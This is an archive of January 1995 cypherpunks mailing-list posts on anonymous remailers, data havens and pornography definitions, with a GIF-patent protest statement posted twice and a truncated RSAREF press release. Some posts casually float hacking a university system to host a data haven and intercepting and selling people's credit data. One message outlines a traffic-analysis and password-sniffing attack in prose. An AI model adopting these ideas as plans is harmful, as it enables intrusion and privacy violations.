Date: Mon, 9 Jan 95 17:37:08 PST
To: "L. McCarthy" <cypherpunks@toad.com
Subject: Re: revoked transactions/guerrilla fee remailers
Message-ID: <ab3795a805021004bf21@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:15 PM 01/09/95, L. McCarthy wrote:
>- - From what I've seen so far, accepting payment would seem to make anonymous
>_operation_ of a remailer well nigh impossible. Anonymous operation with
>revenue would require a corresponding level of anonymity in the transfer of
>money. Until such time as conversion of funds from a net-liquid form to a
>conventional form becomes unnecessary (or just commonplace ?), financial
>traffic analysis can't adequately be thwarted.
>All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla
>remailers charging for service any time soon. There's just too much
>infrastructure to which they'd need to be tied at the moment.

Well, that's certainly true, for the reasons you gave.  Right now, it's
enough of a chore just to get non-anonymously run remailers charging for
operation.  And it's not easy to set up an effective guerilla remailer
either.
I think the set of tools and environments that make it possible to run a
remailer anonymously and charge for it certainly aren't going to exist
until the component problems of charging for a remailer at all and running
a guerilla remailer at all are made easy.  I think once both of those
problems are dealt with, it won't be too dificult to deal with the combined
problem of guerilla for-pay remailers.  Or at least, exactly what things
are neccesary to solve that combined problem will be obvious.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 18:58:04 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Experiments and Toys vs. the Real Thing
In-Reply-To: <199501091946.LAA06410@netcom18.netcom.com>
Message-ID: <Pine.3.89.9501092044.B8850-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, Timothy C. May wrote:

I was one who wrote a post saying that a data haven should support all 
files, including porno and such things, and that filtering would be bad 
karma.  I was under the assumption then that we were talking about fully 
operational, well established Data-havens, as in I thought were were 
speaking mostly hypotjetically.  I agree with tim when it comes to the 
experimental stage of a project.

> Digital cash is more clearly still at the experimental level, as are
> anonymous markets (like BlackNet), data havens, and so forth.
>
I would like it if the person who is working ont eh datahaven code would 
give us soem more information, like what it does, what are the plans for 
it etc..  DataHaven is a vague word.

Blacknet is going on right now, only none of uf are involved in it, not 
to say I'm so k-rad and kool that i am underground and involved in it, 
but eh anonymous market is alive today, JUST that it isn't bieng studied, 
like one such as BlackNet concievably owuld have been. There are 
definetly people making anon. transactions out there.

> The recent claims that nascent "data havens" _must_ support all files,
> including hard-core porn, weapons secrets, etc. seems to be an example
> of this. I'm not for censorship, just concerned that the data haven
> _experiments_ are not secure enough, not robust enough, to actually
> carry high-visibility files.
> 
 
I was refering to the finished, established project, and not the 
experiment/study level.

> (And let's not forget "snatch teams" that grab foreign nationals
> suspected of crimes...Israel, Iraw, Iran, and the U.S. have grabbed
> people in other countries. And more common is simple execution. If a
> Swedish data haven carried files related to U.S. operations, and the
> data haven location was known--part of what I mean by saying the
> enabling technologies do not yet exist--then various measures would be
> applied. Diplomatic, equipment sabotoage, even killing the operators.
> I'm not being Ludlumesque here...clearly such "threats to national
> security" would be seen as justifying various reactions. Especially to
> send a message to other potential operators.)
>
Sterling's _Islands In The Net_ is a must read for this topic matter.  
In this book, the DataHaven operators maintain security thru the data 
they horde, by hoding it over poeples heads, and also by just plain 
technical savvy(ala action thrillers hehe)
 
> --Tim May, who thinks the first real data havens will come under
> intense attack and so had better be secure from the start
>
I would like to help get them off the ground, by either providing help 
with code, policy, or just another head in teh game.  They are a techno 
fetish of mine, I mean I'm even nymed after one, Nesta Stubbs, from 
_Islands In The Net_ 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 19:09:47 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <199501100125.TAA29250@pentagon.io.com>
Message-ID: <Pine.3.89.9501092040.C8850-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995 dfloyd@io.com wrote:

> My problem is not that people will bitch about my DH.  My problem will
> be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
> making a long report how I cater to p*dofiles and other evil denezins
> that pop from time to time.  Then, I get the police knocking at my
> door, asking me to come to Club Fed for a looooonnnggg vacation.
>
I myself see nothing wrong with selectivly choosing your users at this 
juncture.  With an experimental server that wouldn't have the back-up to 
protect itself fomr attacks in real-space(police feds guns dogs fundies) 
you DO need to be careful.  If you wanna turn this into a profit 
thing(which is possible) you then would get to choose your clients.  I 
guess what I meant o say in tha tlast letter, was directed towards a 
full-fledged, well established and backed DataHaven that was not run for 
profit, but rather as a service to help the public(yeah, I know this 
lists idea on those projects, I wont go that direction no more) and thus 
would need to be open liek that.
 
> Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
> it is trivial to use traffic analysis to find where the DH lies.  Just
> monitor traffic from/to the remailer and do a series of store/retrives.
> Then for confirmation, forge a mail from the dh site to the remailer with
> the password (obtained from sniffing) to yourself.
>
Well for an experiemnt that is fine, and I don't see it then much mroe 
then a listerv file service with encryption, unless i am missing 
something in teh DataHaven you have planned.  But later on when you wanna 
get serious and shit, you could get better shielding then that, depending 
on how much money you wanna spend.  Everythign from offshore sites with 
sattelite feeds or radio feeds(encrypted of course) with physical securiy 
measures and such.
 
> This is the main reason I haven't worked on this code for so long, as
> well as finals and other distractions.  Until I find a decent solution
> to this problem (The alpha test will be a snap... just allow certain
> people to send/get and ban all others, but once in full working mode
> this ceases to be a solution.) I am hesitant on setting up a working
> DH.
> 
I would set one up if I had the code tha tmet my standards(I don't have 
time right now to write it myself, but maybe if this thread goes well i 
will be inspired enough to order a few pizzas and go for it).  Right now 
my connection is muc much too slow to allow such traffic.  This is 
somethign i have been doing some serious thinking about also.  I cn 
actually see it bieng possible for me to have a small scale experiemntal 
data haven up and running in the near future, acting not only as a drop 
box, but also as a storage place and database of obscure information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 19:13:27 PST
To: root <root@einstein.ssz.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100141.TAA00216@einstein.ssz.com>
Message-ID: <Pine.3.89.9501092103.D8850-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, root wrote:

> 
> From: ravage@bga.com
>   To: cpunks the world over
> 
> Hi all,
> 
> I am very interested in the data haven issue now that I have my site up. The
> aspect of pornography is a problem that has to be faced. To this end, I would
> like to ask that we look at how pornography is defined.

What you define as pornography doesn't mean shit, it's what the media and 
jornalists and fundies etc.. decide is pornographic that you gotta watch 
out for.  This means just about anythign that isn't vanilla After School 
Special material is suspect.  

I too mayt have a site int eh near future, so I am interested int eh 
project also, as I have always been really into the idea of data-havens. 
I think that a self-sufficient data-haven is going to need alot of 
resources tho to continue it's operation past the pont were it is known 
to exist.

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raul Deluth Miller <rockwell@nova.umd.edu>
Date: Mon, 9 Jan 95 18:25:54 PST
To: cypherpunks@toad.com
Subject: data havens
Message-ID: <199501100225.VAA08907@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


The problem with encryption, in general, is that it's an attempt to
hide information -- unless the information is trivial, encryption is
only a temporary measure.

Believe it or not, the government (or, more properly, people
associated with the government) is still trying to figure out which
industries are Iraqi owned -- one technique being brought to bear is
statistical analysis of company activities, with special attention to
changes which occurred during the gulf war.

The only way to have data havens be acceptable to the U.S. government
would be to have them become acceptable to the U.S. population (or
some significant fraction of them).  This would imply phasing out the
DEA and the IRS, at a minimum.  [Newspaper article this weekend: how
it's so horrible that some people deal in cash and thus are evading
the IRS.]

More generally, the way to keep a data haven from being located is to
make sure it doesn't have a location...  This is hard to do without
severely impacting latency.

-- 
Raul D. Miller          N=:((*/pq)&|)@                 NB. public e, y, n=:*/pq
<rockwell@nova.umd.edu> P=:*N/@:#               NB. */-.,e e.&factors t=:*/<:pq
                        1=t|e*d    NB. (,-:<:)pq is four large primes, e medium
x-:d P,:y=:e P,:x                  NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Mon, 9 Jan 95 19:30:14 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: Data Haven problems
Message-ID: <9501100322.AB12220@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:25 PM 1/9/95, dfloyd@io.com wrote:
> ... Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
>it is trivial to use traffic analysis to find where the DH lies.  Just
>monitor traffic from/to the remailer and do a series of store/retrives.
>Then for confirmation, forge a mail from the dh site to the remailer with
>the password (obtained from sniffing) to yourself. ...

Hmm, hmm.  Using c'punk remailers with encrypted send blocks fixes one 
problem, especially if the c'punk mailers do some sort of file splitting and 
reassembly along the lines of what happens to IP packets that are too large 
for a given link.  What would also help would be a mechanism for randomly 
varying the encrypted send-to block.  The password replay attacks can be 
fixed by encrypting the transmitted password along with a timestamp/sequence 
number.

One problem that remains would be a trail left by the increased traffic 
to/from a DH vs a normal user.  That could only be fixed by a multitude of 
DH sites.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 9 Jan 95 20:36:44 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: Pornography, What is it?
In-Reply-To: <Pine.3.89.9501092103.D8850-0100000@nesta.pr.mcs.net>
Message-ID: <199501100432.WAA00738@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> > 
> > I am very interested in the data haven issue now that I have my site up. The
> > aspect of pornography is a problem that has to be faced. To this end, I would
> > like to ask that we look at how pornography is defined.
> 
> What you define as pornography doesn't mean shit, it's what the media and 
> jornalists and fundies etc.. decide is pornographic that you gotta watch 
> out for.  This means just about anythign that isn't vanilla After School 
> Special material is suspect.  
>
I am well aware that what I personaly consider pornography carries little
weight. But it does carry some since I do vote. There is the whole issue of
community standard that has been left out of this discussion so far and that
means that I as a taxed land owner (5 acres in Lockhard, TX) get to sit on
juries now and again. In that sense what I believe can carry a lot of weight.
Even to the point of refusing to convict somebody because I personaly feel a
law or precedence is incorrect. But when you consider states like Oregon where
the whole concept of pornography has been removed from the books it makes me
have a little hope for sanity. My personal contention is that pornography
does not exist any more than good or evil do, these concepts are based on our
personal ethos not anything absolute.
 
> I too mayt have a site int eh near future, so I am interested int eh 
> project also, as I have always been really into the idea of data-havens. 
> I think that a self-sufficient data-haven is going to need alot of 
> resources tho to continue it's operation past the pont were it is known 
> to exist.
> 
As to data havens being dangerous to run...I don't know. At the recent HoHoCon
there was a long discussion 'bout networks hidden within networks that was very
intriguing. If Doug Barnes is reading this he may be willing to reiterate some
of the talk. I do know that at the moment my partners and myself are looking
at remailer software running under Linux and data havens are something that we
have discussed. I personaly see data havens as a repository for information 
that is beyond the keen of governments to regulate. This is the key point to
me. Not whether it is industrial secrets, military secrets, or .gif's that 
jr. can get his rocks off over. I see the whole pornography issue as a red
herring that keeps the dim-witted and ignorant busy on while everyone else
with a clue gets on with their own personal agenda. I do not mean this to imply
a conspiracy, simply that most DA's have something they want (ie political 
clout) and they will in general do whatever it takes to get. In a sense one
could consider such regulatory agencies as mercenaries for personal gain.


> i want to know everything          http://www.mcs.com/~nesta/home.html
> i want to be everywhere                     Nesta's Home Page        
> i want to fuck everyone in the world               &
> i want to do something that matters         /-/ a s t e zine
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Jan 95 23:02:20 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
Message-ID: <199501100701.XAA15283@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Pierre Uszynski <pierre@shell.portal.com>
> Finally, I do not believe that introducing payment in the remailer
> system would curb abuse in any significant way. Significant abuse is
> that which causes significant problems for the operators: posting
> secret religious technology, forging prime minister mail, harrassing a
> member of any number of opposite persuasions, etc... Do you think for a
> minute that a 5 cents postage is going to stop these messages now? And
> how about when remailers do attain good reliability and untraceability,
> for 3 cents?

I had suggested an idea a while back where you would try to address the
abuse issue directly rather than charging per message.  I agree with
Pierre that any reasonable per-message charge will not help in many forms
of abuse, although it should address the worst spam attacks.

The idea is to have a sort of digital cash token, but it is free.  The
key is that each person just gets one of these, but they are reusable.
After a remailer sends a message, it waits and sees if it gets any
complaints.  If not, the token is re-blinded and made available to the
original user via some kind of pool.  He can then send another message.
But if he commits abuse, he doesn't get his token back.

Obviously there are problems with this, the worst probably being how we
can keep people from acquiring lots of tokens under different names.
Perhaps you could charge some small amount for them, but require VISA
payment, and check the names on the VISA cards.  (This doesn't hurt
anonymity when the tokens are actually used because of the blinding.)  To
get multiple tokens a person would have to commit some serious real world
name trickery, a considerably higher barrier than making up a pseudonym
on the net.

Another problem is that as stated above, you could only send one
anonymous message every day or two.  Perhaps we relax the rules and let
people have a few of these tokens; they can then abuse the system a few
times but each time they lose a token.

A similar idea might work for the data haven problem, although I don't
understand exactly what is intended there.  This approach is a variation on
the "is a person" credential, which attempts to make sure that each
person only gets one of something.  A lot of situations would benefit
from such a credential, although some people don't like them.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxIw2RnMLJtOy9MBAQGWCgH6A1SFyzZDDhd/NVrMck5SAf3mS4IOl5On
aJNFKUopZi4Fb7tqQfbFukDl/lF+clnBDBNh/yXAsFcABJaWaTUzZA==
=pLOT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 21:07:46 PST
To: root <root@einstein.ssz.com>
Subject: Re: Pornography, What is it?
In-Reply-To: <199501100432.WAA00738@einstein.ssz.com>
Message-ID: <Pine.3.89.9501092201.A9794-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, root wrote:

> As to data havens being dangerous to run...I don't know. At the recent HoHoCon
> there was a long discussion 'bout networks hidden within networks that was very
> intriguing. If Doug Barnes is reading this he may be willing to reiterate some
> of the talk. I do know that at the moment my partners and myself are looking
> at remailer software running under Linux and data havens are something that we
> have discussed. I personaly see data havens as a repository for information 
> that is beyond the keen of governments to regulate. This is the key point to
> me. Not whether it is industrial secrets, military secrets, or .gif's that 
> jr. can get his rocks off over. 

This is something I have been doing seom writing on lately, teh idea of 
nets on top of nets, the almost fractal nature of networking of this 
scale and horizontal nature on the INternet.  A DatHaven, like I 
mentioned in another post, is a vauge name, it could be some hacker kid 
with a lot of space on his HD and a fast modem who hacks the local 
univeristy and installes term, riggin his term connection to allow FTP 
connections, or telnet connections, or it oculd be someone with a decent 
size dinvestor backing him up as he gets a site linked ot teh net from 
some Carribean Island, who collects and intercepts TRW and Equifax like 
data on credit transactions and shit like that, selling it to those about 
to invest in soemone or something and want more info on it.  OR maybe 
it's an elaborate set-up of mail aliases thru remailer chains and 
clearing stations that lead to data safe deposit boxes, where someone can 
leave a large amount of date anon, and then allow osmeone else to 
retrieve it anon also.  With suffiecient planning, coding and equipment a 
datahaven could perform almost all the ideas that Tim came up with in his 
cyphernomicon, from selling crdit info, to a data drop box, to a holding 
agent for anon transactions(can't remember proper term).

damn I wish I could have made it to HoHoCon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raul Deluth Miller <rockwell@nova.umd.edu>
Date: Mon, 9 Jan 95 20:07:07 PST
To: cypherpunks@toad.com
Subject: Re: Pornography, What is it?
Message-ID: <199501100406.XAA14238@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Pornography is in the eyes of the beholder.

[Especially if the beholder happens to be a postmaster in Memphis...]

-- 
Raul D. Miller          N=:((*/pq)&|)@                 NB. public e, y, n=:*/pq
<rockwell@nova.umd.edu> P=:*N/@:#               NB. */-.,e e.&factors t=:*/<:pq
                        1=t|e*d    NB. prim=:1&=@| 2&^@<: [. large=:>&(2^1024)
x-:d P,:y=:e P,:x                  NB. (d P,:y)-:D P*:N^:(i.#D)y [. D=:|.@#.d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dean Anderson <dean@hi.com>
Date: Thu, 12 Jan 95 14:12:56 PST
To: lpf-all-members@albert.gnu.ai.mit.edu
Subject: LPF Statement on the GIF controversy
Message-ID: <9501092348.AA28210@loki.hi.com>
MIME-Version: 1.0
Content-Type: text/plain


      [ Please repost this wherever you think is appropriate! ]

Until now, most computer professionals and companies have ignored the
problem of software patents.  The GIF format for graphical images was
adopted widely on the net, despite the Unisys patent covering the LZW
data compression algorithm.  The patent dates to 1985, but its
enforcement has been carried out with private threats; most victims
are afraid to talk about it.  Now the patent has shown its teeth.

For a few days, the Internet community was shaking with anger at the
surprise demand to pay license fees for the use of GIF format.

It turns out that the license being offered today is only for
Compuserve users.  Compuserve accepted an offer from Unisys that they
couldn't refuse.  Compuserve users can accept this offer now, or face
Unisys later on their own.  The rest of us don't have a choice--we get
to face Unisys when they decide it's our turn.  So much trouble from
just one software patent.

There are now over ten thousand software patents in the US, and
several thousand more are issued each year.  Each one may be owned by,
or could be bought by, a grasping company whose lawyers carefully plan
to attack people at their most vulnerable moments.  Of course, they
couch the threat as a "reasonable offer" to save you miserable years
in court.  "Divide and conquer" is the watchword: pursue one group at
a time, while advising the rest of us to relax because we are in no
danger today.

Software patents may not seem like an urgent problem until you find
one aimed at you.  We all have other fires to fight, and most
developers have hoped that the patents would never blaze up.

In an ironic way, Unisys has done us a favor--by showing that the
problem is too serious to ignore.  What people first feared, could
just as well have happened.  Each of the thousands of software patents
has the potential to devastate a segment of the community, both
software developers and users.  There will be more nasty surprises.
They are part of a system.

Unisys has given us a chance to work together to change the
system--rather than waiting to be sued one by one for this patent or
that.  We can win the fight against software patents, if we speak loud
and clear against them.


What can people do?


* Express your disapproval to Unisys by writing a letter to its CEO.
Tell him what you think of his company's actions:

    James Unruh
    CEO
    UNISYS Corp.
    PO Box 500
    Blue Bell, PA 19424
    fax: 215-986-6850

Please use snail mail--a physical pile of letters is more impressive,
psychologically, than a big file of email.  Keep it short--ten lines
is enough.  Don't spend hours composing your letter; there's no need.
But do write it in your own words, because sending a form letter
written by someone else is not impressive.

Make it clear that the usual excuses--"We're just exercising our
property rights; look how reasonable we are being (compared to what we
_could_ have done)"--won't wash with you.

Avoid saying anything nasty that would give Unisys a chance to paint
itself as the victim.  Cold condemnation is more powerful than flames.

Please email a copy of your letter to the League for Programming
Freedom at gif-letters@lpf.org.  We might ask you for permission
to publish your letter.

* Don't sign a license--stop using GIF.  The World Wide Web consortium
at MIT will probably be coordinating the move away from GIF, and
offering advice and assistance.

   See `http://www.w3.org/'.

* Join the League for Programming Freedom.  The League is a
membership-based organization whose aim is to bring back the freedom
to write software.  The League says that no one should be able to
dictate what kinds of programs you can write.

You can contact the LPF by email to lpf@uunet.uu.net,
or look at its Web pages at `http://www.lpf.org/'.


** Note: the recent license demand came in the name of Compuserve; but
the impetus for it came from Unisys.

Compuserve developed the GIF format many years ago, not knowing there
was a patent on LZW.  (Most programmers have no idea what patents
their programs are vulnerable to--there are too many patents to keep
track of.)  When Unisys threatened to sue them, Compuserve had to give
in to Unisys's demands.  Compuserve arranged to be allowed to offer
Compuserve users a sublicense, but the "offer" was formulated in a way
that was tantamount to an ultimatum.

Compuserve may bear responsibility for some of the details of how this
was handled, but the main responsibility falls on Unisys.  It is
Unisys that claims the power to dictate what kinds of software you can
write.  Unisys decided to use the power for aggression; Unisys forced
Compuserve to participate.



=++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++=
Dean Anderson                                               Dean@hi.com
President
League for Programming Freedom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dean Anderson <dean@hi.com>
Date: Thu, 12 Jan 95 17:24:56 PST
To: lpf-all-members@albert.gnu.ai.mit.edu
Subject: /n@Nd0/ LPF Statement on the GIF controversy
Message-ID: <9501092348.AA28210@loki.hi.com.nando>
MIME-Version: 1.0
Content-Type: text/plain


      [ Please repost this wherever you think is appropriate! ]

Until now, most computer professionals and companies have ignored the
problem of software patents.  The GIF format for graphical images was
adopted widely on the net, despite the Unisys patent covering the LZW
data compression algorithm.  The patent dates to 1985, but its
enforcement has been carried out with private threats; most victims
are afraid to talk about it.  Now the patent has shown its teeth.

For a few days, the Internet community was shaking with anger at the
surprise demand to pay license fees for the use of GIF format.

It turns out that the license being offered today is only for
Compuserve users.  Compuserve accepted an offer from Unisys that they
couldn't refuse.  Compuserve users can accept this offer now, or face
Unisys later on their own.  The rest of us don't have a choice--we get
to face Unisys when they decide it's our turn.  So much trouble from
just one software patent.

There are now over ten thousand software patents in the US, and
several thousand more are issued each year.  Each one may be owned by,
or could be bought by, a grasping company whose lawyers carefully plan
to attack people at their most vulnerable moments.  Of course, they
couch the threat as a "reasonable offer" to save you miserable years
in court.  "Divide and conquer" is the watchword: pursue one group at
a time, while advising the rest of us to relax because we are in no
danger today.

Software patents may not seem like an urgent problem until you find
one aimed at you.  We all have other fires to fight, and most
developers have hoped that the patents would never blaze up.

In an ironic way, Unisys has done us a favor--by showing that the
problem is too serious to ignore.  What people first feared, could
just as well have happened.  Each of the thousands of software patents
has the potential to devastate a segment of the community, both
software developers and users.  There will be more nasty surprises.
They are part of a system.

Unisys has given us a chance to work together to change the
system--rather than waiting to be sued one by one for this patent or
that.  We can win the fight against software patents, if we speak loud
and clear against them.


What can people do?


* Express your disapproval to Unisys by writing a letter to its CEO.
Tell him what you think of his company's actions:

    James Unruh
    CEO
    UNISYS Corp.
    PO Box 500
    Blue Bell, PA 19424
    fax: 215-986-6850

Please use snail mail--a physical pile of letters is more impressive,
psychologically, than a big file of email.  Keep it short--ten lines
is enough.  Don't spend hours composing your letter; there's no need.
But do write it in your own words, because sending a form letter
written by someone else is not impressive.

Make it clear that the usual excuses--"We're just exercising our
property rights; look how reasonable we are being (compared to what we
_could_ have done)"--won't wash with you.

Avoid saying anything nasty that would give Unisys a chance to paint
itself as the victim.  Cold condemnation is more powerful than flames.

Please email a copy of your letter to the League for Programming
Freedom at gif-letters@lpf.org.  We might ask you for permission
to publish your letter.

* Don't sign a license--stop using GIF.  The World Wide Web consortium
at MIT will probably be coordinating the move away from GIF, and
offering advice and assistance.

   See `http://www.w3.org/'.

* Join the League for Programming Freedom.  The League is a
membership-based organization whose aim is to bring back the freedom
to write software.  The League says that no one should be able to
dictate what kinds of programs you can write.

You can contact the LPF by email to lpf@uunet.uu.net,
or look at its Web pages at `http://www.lpf.org/'.


** Note: the recent license demand came in the name of Compuserve; but
the impetus for it came from Unisys.

Compuserve developed the GIF format many years ago, not knowing there
was a patent on LZW.  (Most programmers have no idea what patents
their programs are vulnerable to--there are too many patents to keep
track of.)  When Unisys threatened to sue them, Compuserve had to give
in to Unisys's demands.  Compuserve arranged to be allowed to offer
Compuserve users a sublicense, but the "offer" was formulated in a way
that was tantamount to an ultimatum.

Compuserve may bear responsibility for some of the details of how this
was handled, but the main responsibility falls on Unisys.  It is
Unisys that claims the power to dictate what kinds of software you can
write.  Unisys decided to use the power for aggression; Unisys forced
Compuserve to participate.



=++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++=
Dean Anderson                                               Dean@hi.com
President
League for Programming Freedom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Tue, 10 Jan 95 00:16:36 PST
To: cypherpunks@toad.com
Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF (long)
Message-ID: <v02110103ab37f1277f38@[198.68.251.11]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PRIVACY-ENHANCED MESSAGE-----
Proc-Type: 4,MIC-CLEAR
Content-Domain: RFC822
Originator-Certificate:
 MIICRjCCAdsCBQJTAAAEMA0GCSqGSIb3DQEBAgUAME4xCzAJBgNVBAYTAlVTMRMw
 EQYDVQQIEwpDYWxpZm9ybmlhMSowKAYDVQQKEyFDb25zZW5zdXMgRGV2ZWxvcG1l
 bnQgQ29ycG9yYXRpb24wHhcNOTQwNjI3MDAwMDAwWhcNOTUwNjI2MjM1OTU5WjCB
 4DELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExKjAoBgNVBAoTIUNv
 bnNlbnN1cyBEZXZlbG9wbWVudCBDb3Jwb3JhdGlvbjETMBEGA1UEERMKOTQxMTQt
 MzYxNTETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNU2FuIEZyYW5jaXNj
 bzEeMBwGA1UECRQVNDEwNC0yNHRoIFN0cmVldCCmNDE5MRIwEAYDVQQMEwlQcmVz
 aWRlbnQxGjAYBgNVBAMTEUNocmlzdG9waGVyIEFsbGVuMHAwDQYJKoZIhvcNAQEB
 BQADXwAwXAJVKa43Pd6AhLaYGRLMwvGGvZ7dtzK+XpsRtwKYEDQKHE8swS09ViEg
 MKuMa/+weQXDBpqQ6SDj/xgHGzmwGhkbeitPWr/6Du5gemMLrhhTs8eMhAXLXwID
 AQABMA0GCSqGSIb3DQEBAgUAA1YAEkQDfJmroAMZD5v1F7fPK38y4waoX0FSpdsf
 jcXf04URcEJc5dCFm0DzrMPMdVpNz5tpSBy0ZUeg/xqbwRfHIW34bMAVLc9kojIi
 AGXlHL/q8HRCIx==
Issuer-Certificate:
 MIIB6TCCAVYCBQJBAAAKMA0GCSqGSIb3DQEBAgUAMFwxCzAJBgNVBAYTAlVTMSAw
 HgYDVQQKExdSU0EgRGF0YSBTZWN1cml0eSwgSW5jLjErMCkGA1UECxMiQ29tbWVy
 Y2lhbCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAeFw05NDA1MDUwMTEwMDRaFw05
 OTA0MzAwMTEwMDRaME4xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlh
 MSowKAYDVQQKEyFDb25zZW5zdXMgRGV2ZWxvcG1lbnQgQ29ycG9yYXRpb24wcDAN
 BgkqhkiG9w0BAQEFAANfADBcAlUpc+2/Ec+bydwsB6enemznB/aQwd4gp2YSI3FW
 PHl2tc/aa7HZFA0qCL/0Ol6ituC+yUEO3IWKQ5U8hhl1RVqmW7mzwNOr2yeHIFA5
 rqXvAvMvlGpvAgMBAAEwDQYJKoZIhvcNAQECBQADfgA2QEssX/nG3spHBpbkU4KV
 oQdVhxtQEmjuIrqBVI9jQRntacJ0tw1m5MsLV6hNMV/mD0yKmDc9ywSF7ZWIipVY
 tz8E52yQEprR+JxTad+/ZtTI0wEvEM5313jUF4ivF86eOuZDqHd4zbRHk6ggIAGH
 86GFbMaWDaKoGUrde2==
MIC-Info: RSA-MD5,RSA,
 J9l0zSgqnVqK8a9QQ3Ml+O6tv58PsVmCELOQTqj1i8HCQoHpJ+bEmayf4WyIbqoY
 y4xFecAPQfP5hpHPLVoLX4IM7kNT0UhDHW8XklfhhAVE1+Y0Og==

Date: Mon, 09 Jan 1995 09:00:00 -0800
Subject: PRESS RELEASE - RSA Licenses Commercial Distribution Rights to RSAREF
From: Christopher Allen <ChristopherA@consensus.com>
Organization: Consensus Development Corporation, San Francisco, CA USA
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Text-Source: ftp://ftp.consensus.com/pub/consensus/pr/RSAREF-PR.txt
X-HTML-Source: http://www.consensus.com:8300/RSAREF-PR.html
Summary: RSA announces that it is licensing commercial distribution
  rights of its RSAREF software to Consensus Development, allowing
  for implementation of commercial Privacy Enhanced Mail (PEM)
  applications.
Keywords: press release, consensus development corporation, rsa data
  security, rsaref, commercial license, support, marketing, maintenance,
  encryption, digital signature, source code, tool kit, PEM, privacy
  enchanced mail


RSA Licenses Commercial Distribution Rights to RSAREF
=====================================================
  RSA announces that it is licensing commercial distribution
  rights of its RSAREF software to Consensus Development, allowing
  for implementation of commercial Privacy Enhanced Mail (PEM)
  applications.


Press Release
- -------------
  REDWOOD SHORES, CALIFORNIA--JANUARY 9, 1995--RSA Data Security,
  Inc. and Consensus Development Corporation jointly announce today
  at the RSA Data Security Conference that Consensus Development is
  licensing the commercial distribution rights of RSAREF from RSA
  Data Security.

  RSAREF (pronounced "R.S.A. reff") is short for "RSA reference
  implementation" and is a cryptography source code toolkit designed
  to allow developers to create PEM (Privacy-Enhanced Mail)software
  and other encryption/authentication tools. Until now, RSAREF has
  been an unsupported RSA product approved for use only as part of
  freeware and not-for-profit software applications.

  Consensus Development will now be able to market and license RSAREF
  to commercial software developers, and provide software support and
  future enhancements to the RSAREF source code library.

  This announcement is significant because it is the first program of
  its kind to make the RSAREF implementation of RSA's popular
  patented authentication technology available to commercial vendors.

  "Data mailed, posted, or put on servers on the Internet is
  inherently untrustable today, " said Jim Bidzos, president of RSA.
  "Tampering with electronic documents takes no special skills, and
  leaves no trace.With the availability of RSAREF for both free
  software as well as commercial software there is no need for this
  situation to continue."

  Now that a commercial license to RSAREF is available, applications
  may now be developed and sold that incorporate Privacy-Enhanced
